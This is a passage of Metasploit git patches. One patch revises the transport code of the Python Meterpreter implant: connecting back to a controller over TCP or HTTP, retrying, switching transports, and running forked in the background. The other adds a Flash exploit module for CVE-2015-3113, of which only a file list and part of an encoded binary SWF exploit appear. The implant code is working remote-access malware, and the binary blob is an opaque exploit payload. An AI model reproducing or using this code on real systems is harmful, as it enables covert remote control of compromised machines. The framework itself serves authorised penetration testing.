+  CachedSize = 884782
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

From 2a891c50ebf8f8211f9b27b314135a115123c230 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Wed, 1 Jul 2015 11:12:30 -0400
Subject: [PATCH 0613/1013] Pymet transport stabilty and correction

---
 data/meterpreter/meterpreter.py | 146 ++++++++++++++++++++++----------
 1 file changed, 103 insertions(+), 43 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 8088c6af2e..9fdf586fdc 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -77,9 +77,6 @@ PACKET_TYPE_RESPONSE       = 1
 PACKET_TYPE_PLAIN_REQUEST  = 10
 PACKET_TYPE_PLAIN_RESPONSE = 11
 
-STAGE_END_MARKER = bytes('### meterpreter stage end ###\n')
-STAGE_START_MARKER = bytes('#!/usr/b')
-
 ERROR_SUCCESS = 0
 # not defined in original C implementation
 ERROR_FAILURE = 1
@@ -409,10 +406,17 @@ class Transport(object):
 	def __init__(self):
 		self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
 		self.communication_last = 0
-		self.communication_active = True
+		self.communication_active = False
 		self.retry_total = SESSION_RETRY_TOTAL
 		self.retry_wait = SESSION_RETRY_WAIT
 
+	def __repr__(self):
+		return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)
+
+	@property
+	def communication_has_expired(self):
+		return self.communication_last + self.communication_timeout < time.time()
+
 	@staticmethod
 	def from_request(request):
 		url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
@@ -427,30 +431,55 @@ class Transport(object):
 		transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
 		return transport
 
+	def _activate(self):
+		return True
+
 	def activate(self):
+		end_time = time.time() + self.retry_total
+		while time.time() < end_time:
+			try:
+				activate_succeeded = self._activate()
+			except:
+				activate_succeeded = False
+			if activate_succeeded:
+				self.communication_last = time.time()
+				self.communication_active = True
+				return True
+			time.sleep(self.retry_wait)
+		return False
+
+	def _deactivate(self):
 		return
 
 	def deactivate(self):
-		return
+		try:
+			self._deactivate()
+		except:
+			pass
+		self.communication_last = 0
+		self.communication_active = False
+		return True
 
 	def get_packet(self):
-		self.communication_active = False
 		try:
 			pkt = self._get_packet()
 		except:
+			self.communication_active = False
 			return None
-		self.communication_active = True
-		self.communication_last = time.time()
+		if pkt:
+			self.communication_active = True
+			self.communication_last = time.time()
 		return pkt
 
 	def send_packet(self, pkt):
-		self.communication_active = False
 		try:
 			self._send_packet(pkt)
 		except:
-			return None
+			self.communication_active = False
+			return False
 		self.communication_active = True
 		self.communication_last = time.time()
+		return True
 
 	def tlv_pack_timeouts(self):
 		response  = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
@@ -484,19 +513,32 @@ class HttpTransport(Transport):
 		urllib.install_opener(opener)
 		self.url = url
 		self._http_request_headers = {'Content-Type': 'application/octet-stream'}
+		self._first_packet = None
+
+	def _activate(self):
+		return True
+		self._first_packet = None
+		packet = self._get_packet()
+		if packet is None:
+			return False
+		self._first_packet = packet
+		return True
 
 	def _get_packet(self):
+		if self._first_packet:
+			packet = self._first_packet
+			self._first_packet = None
+			return packet
 		packet = None
 		request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
 		url_h = urllib.urlopen(request, timeout=self.communication_timeout)
 		packet = url_h.read()
-		if packet:
-			if packet[8:] == STAGE_START_MARKER:
-				return _get_packet()
-			packet = packet[8:]
-		else:
-			packet = None
-		return packet
+		if not packet or len(packet) < 8:
+			return None
+		pkt_length, _ = struct.unpack('>II', packet[:8])
+		if len(packet) != pkt_length:
+			return None
+		return packet[8:]
 
 	def _send_packet(self, packet):
 		request = urllib.Request(self.url, packet, self._http_request_headers)
@@ -517,6 +559,7 @@ class TcpTransport(Transport):
 		self.url = url
 		self.socket = socket
 		self._cleanup_thread = None
+		self._first_packet = True
 
 	def _sock_cleanup(self, sock):
 		remaining_time = self.communication_timeout
@@ -528,9 +571,7 @@ class TcpTransport(Transport):
 			remaining_time -= time.time() - iter_start_time
 		sock.close()
 
-	def activate(self):
-		if self.socket:
-			return
+	def _activate(self):
 		if self.url.startswith('tcp:'):
 			family = socket.AF_INET
 			address, port = self.url[6:].split(':', 1)
@@ -538,6 +579,7 @@ class TcpTransport(Transport):
 			family = socket.AF_INET6
 			address, port = self.url[7:].split(':', 1)
 		port = int(port.rstrip('/'))
+		timeout = max(self.communication_timeout, 30)
 		if address in ('', '0.0.0.0', '::'):
 			try:
 				server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
@@ -546,34 +588,41 @@ class TcpTransport(Transport):
 				server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 			server_sock.bind(('', port))
 			server_sock.listen(1)
-			if not select.select([server_sock], [], [], self.communication_timeout)[0]:
-				raise RuntimeError('connection timed out')
+			if not select.select([server_sock], [], [], timeout)[0]:
+				server_sock.close()
+				return False
 			sock, _ = server_sock.accept()
 			server_sock.close()
 		else:
 			sock = socket.socket(family, socket.SOCK_STREAM)
+			sock.settimeout(timeout)
 			sock.connect((address, port))
+			sock.settimeout(None)
 		self.socket = sock
-		return
+		self._first_packet = True
+		return True
 
-	def deactivate(self):
-		if not self.socket:
-			return
+	def _deactivate(self):
 		cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
 		cleanup.run()
 		self.socket = None
 
 	def _get_packet(self):
 		packet = None
-		if select.select([self.socket], [], [], self.communication_timeout)[0]:
+		first = self._first_packet
+		self._first_packet = False
+		if select.select([self.socket], [], [], max(self.communication_timeout, 0.5))[0]:
 			packet = self.socket.recv(8)
 			if len(packet) != 8:
+				if first and len(packet) == 4:
+					received = 0
+					pkt_length = struct.unpack('>I', packet)[0]
+					self.socket.settimeout(max(self.communication_timeout, 30))
+					while received < pkt_length:
+						received += len(self.socket.recv(pkt_length - received))
+					self.socket.settimeout(None)
+					return self._get_packet()
 				return None
-			if packet == STAGE_START_MARKER:
-				while self.socket.recv(len(STAGE_END_MARKER), socket.MSG_PEEK) != STAGE_END_MARKER:
-					self.socket.recv(1)
-				self.socket.recv(len(STAGE_END_MARKER))
-				return self._get_packet()
 			pkt_length, pkt_type = struct.unpack('>II', packet)
 			pkt_length -= 8
 			packet = bytes()
@@ -601,7 +650,6 @@ class TcpTransport(Transport):
 class PythonMeterpreter(object):
 	def __init__(self, transport):
 		self.transport = transport
-		self.transport.activate()
 		self.running = False
 		self.last_registered_extension = None
 		self.extension_functions = {}
@@ -648,13 +696,21 @@ class PythonMeterpreter(object):
 		return idx
 
 	def get_packet(self):
-		return self.transport.get_packet()
+		pkt = self.transport.get_packet()
+		if pkt is None and self.transport.communication_has_expired:
+			self.transport_change()
+		return pkt
 
 	def send_packet(self, packet):
-		self.transport.send_packet(packet)
+		send_succeeded = self.transport.send_packet(packet)
+		if not send_succeeded and self.transport.communication_has_expired:
+			self.transport_change()
+		return send_succeeded
 
 	@property
 	def session_has_expired(self):
+		if self.session_expiry_time == 0:
+			return False
 		return time.time() > self.session_expiry_end
 
 	def transport_change(self, new_transport=None):
@@ -663,7 +719,10 @@ class PythonMeterpreter(object):
 		if new_transport is None:
 			new_transport = self.transport_next()
 		self.transport.deactivate()
-		new_transport.activate()
+		self.debug_print('[*] changing transport to: ' + new_transport.url)
+		while not new_transport.activate():
+			new_transport = self.transport_next(new_transport)
+			self.debug_print('[*] changing transport to: ' + new_transport.url)
 		self.transport = new_transport
 
 	def transport_next(self, current_transport=None):
@@ -685,7 +744,7 @@ class PythonMeterpreter(object):
 	def run(self):
 		while self.running and not self.session_has_expired:
 			request = None
-			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 0.5)
+			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 1)
 			if should_get_packet:
 				request = self.get_packet()
 			if request:
@@ -827,7 +886,8 @@ class PythonMeterpreter(object):
 		return None
 
 	def _core_transport_list(self, request, response):
-		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
+		if self.session_expiry_time > 0:
+			response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
 		response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
 
 		transport = self.transport_next()
@@ -862,7 +922,7 @@ class PythonMeterpreter(object):
 
 	def _core_transport_set_timeouts(self, request, response):
 		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
-		if timeout_value:
+		if not timeout_value is None:
 			self.session_expiry_time = timeout_value
 			self.session_expiry_end = time.time() + self.session_expiry_time
 		timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
@@ -875,7 +935,8 @@ class PythonMeterpreter(object):
 		if retry_value:
 			self.transport.retry_wait = retry_value
 
-		response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
+		if self.session_expiry_time > 0:
+			response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
 		response += self.transport.tlv_pack_timeouts()
 		return ERROR_SUCCESS, response
 
@@ -885,7 +946,8 @@ class PythonMeterpreter(object):
 		if seconds:
 			self.transport.deactivate()
 			time.sleep(seconds)
-			self.transport.activate()
+			if not self.transport.activate():
+				self.transport_change()
 		return None
 
 	def _core_channel_open(self, request, response):
@@ -1027,5 +1089,3 @@ if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
 		transport = TcpTransport.from_socket(s)
 	met = PythonMeterpreter(transport)
 	met.run()
-
-### meterpreter stage end ###

From 1de94a68650d08244037ac7f1413b7aab7184284 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 1 Jul 2015 13:13:57 -0500
Subject: [PATCH 0614/1013] Add module for CVE-2015-3113

---
 data/exploits/CVE-2015-3113/msf.swf           | Bin 0 -> 20994 bytes
 external/source/exploits/CVE-2015-3113/Elf.as | 235 +++++++++++
 .../source/exploits/CVE-2015-3113/Exploit.as  | 114 +++++
 .../CVE-2015-3113/ExploitByteArray.as         |  85 ++++
 .../exploits/CVE-2015-3113/ExploitVector.as   |  75 ++++
 .../exploits/CVE-2015-3113/Exploiter.as       | 399 ++++++++++++++++++
 .../source/exploits/CVE-2015-3113/Logger.as   |  32 ++
 external/source/exploits/CVE-2015-3113/PE.as  |  72 ++++
 .../browser/adobe_flash_nellymoser_bof.rb     | 185 ++++++++
 9 files changed, 1197 insertions(+)
 create mode 100755 data/exploits/CVE-2015-3113/msf.swf
 create mode 100644 external/source/exploits/CVE-2015-3113/Elf.as
 create mode 100755 external/source/exploits/CVE-2015-3113/Exploit.as
 create mode 100644 external/source/exploits/CVE-2015-3113/ExploitByteArray.as
 create mode 100644 external/source/exploits/CVE-2015-3113/ExploitVector.as
 create mode 100644 external/source/exploits/CVE-2015-3113/Exploiter.as
 create mode 100755 external/source/exploits/CVE-2015-3113/Logger.as
 create mode 100644 external/source/exploits/CVE-2015-3113/PE.as
 create mode 100644 modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb

diff --git a/data/exploits/CVE-2015-3113/msf.swf b/data/exploits/CVE-2015-3113/msf.swf
new file mode 100755
index 0000000000000000000000000000000000000000..ec2bd84de5db4e0871f888c08d57b43ba7d73ef0
GIT binary patch
literal 20994
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
